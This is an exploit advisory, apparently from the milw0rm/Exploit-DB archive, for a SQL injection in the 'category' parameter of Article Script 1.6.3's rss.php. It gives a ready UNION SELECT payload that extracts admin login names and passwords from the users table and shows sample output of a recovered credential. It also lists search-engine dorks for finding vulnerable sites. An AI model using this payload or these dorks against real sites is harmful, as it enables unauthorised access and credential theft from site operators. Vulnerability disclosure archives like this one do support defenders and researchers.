Article Script 1.6.3 - 'rss.php' SQL Injection

EDB-ID:

2728


Author:

Liz0ziM

Type:

webapps


Platform:

PHP

Date:

2006-11-06


Article Script v1.*and v1.6.3 Sql injection

Script Name :Article Script

Home Page:www.articlescript.org

Bug Founder :Liz0ziM

Mail:liz0@bsdmail.org

Baba Kimdir? Tabiki Liz0ziM

------------------------------------------------------------

http://www.victim.com/articles/rss.php?category= ' sql İnjection

Example:

 http://www.victim.com/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*

 <title>admin4521title> ------> Admin name :admin4521

 <link>http://www.victim.com/articles/cs1120/page_1/link>  ----------> Admin password cs1120

Dork:

"Powered by Article Script"

":: Article Script - New User Article ::"

intitle:":: Article Script -"

"Last Articles::"

Greatz My all friend

Source: http://www.blogcu.com/Liz0ziM/1312100/

# milw0rm.com [2006-11-06]